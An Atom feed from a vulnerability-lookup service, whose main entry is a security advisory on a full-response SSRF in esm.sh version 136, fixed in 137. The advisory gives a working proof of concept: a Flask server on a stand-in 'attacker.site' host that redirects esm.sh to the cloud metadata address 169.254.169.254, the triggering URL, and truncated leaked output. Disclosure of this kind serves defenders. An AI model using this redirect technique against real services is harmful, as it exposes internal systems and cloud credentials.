<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-06T17:51:52.817470+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/euvd-2026-273711</id>
    <title>EUVD-2026-273711</title>
    <updated>2026-10-06T17:51:52.867040+00:00</updated>
    <content>EUVD-2026-273711</content>
    <link href="https://cve.radiocsirt.org/vuln/euvd-2026-273711"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/fkie_cve-2025-50180</id>
    <title>fkie_cve-2025-50180</title>
    <updated>2026-10-06T17:51:52.867085+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>esm.sh is a no-build content delivery network (CDN) for web development. In version 136, esm.sh is vulnerable to a full-response SSRF, allowing an attacker to retrieve information from internal websites through the vulnerability. Version 137 fixes the vulnerability.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/fkie_cve-2025-50180"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-3c9r-837r-qqm4</id>
    <title>GHSA-3c9r-837r-qqm4 — esm.sh is vulnerable to full-response SSRF</title>
    <updated>2026-10-06T17:51:52.867120+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> Go: github.com/esm-dev/esm.sh</p>
<p>### Summary</p>
<p>esh.sh is vulnerable to a full-response SSRF, allowing an attacker to retrieve information from internal websites through the vulnerability.</p>
<p>### Details</p>
<p>Vulnerable code location: https://github.com/esm-dev/esm.sh/blob/f80ff8c8d58749e77fa964abde468fc61f8bd89e/server/router.go#L511</p>
<p>If the internal address has a suffix listed below, the attacker can obtain content from the specified internal address.</p>
<p>eg: https://esm.sh/https://local.site/test.md</p>
<p>```
".js", ".ts", ".mjs", ".mts", ".jsx", ".tsx", ".cjs", ".cts", ".vue", ".svelte", ".md", ".css"
```</p>
<p>A 302 redirect can be used to bypass the suffix restriction.</p>
<p>eg: https://esm.sh/https://attacker.site/test.md</p>
<p>https://attacker.site/test.md 302 redirect to http://169.254.169.254/v1.json</p>
<p>### PoC</p>
<p>Use Flask to start a server that returns a 302 redirect.</p>
<p>```python
from flask import Flask, redirect</p>
<p>app = Flask(__name__)</p>
<p>@app.route('/test.md')
def redirect_test():
    return redirect("http://169.254.169.254/v1.json", code=302)</p>
<p>if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)
```</p>
<p>Let esh.sh visit this site.</p>
<p>https://esm.sh/https://attacker.site/test.md</p>
<p>Attacker can obtain data from http://169.254.169.254/v1.json.</p>
<p>```
var t=`&lt;p&gt;&amp;lbrace;&amp;quot;bgp&amp;quot;:&amp;lbrace;&amp;quot;ipv4&amp;quot;:&amp;lbrace;&amp;quot;my-address&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;my-asn&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;peer-address&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;peer-asn&amp;quot;:&amp;quot;&amp;quot;&amp;rbrace;,&amp;quot;ipv6&amp;quot;:&amp;lbrace;&amp;quot;my-address&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;my…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-3c9r-837r-qqm4"/>
  </entry>
</feed>
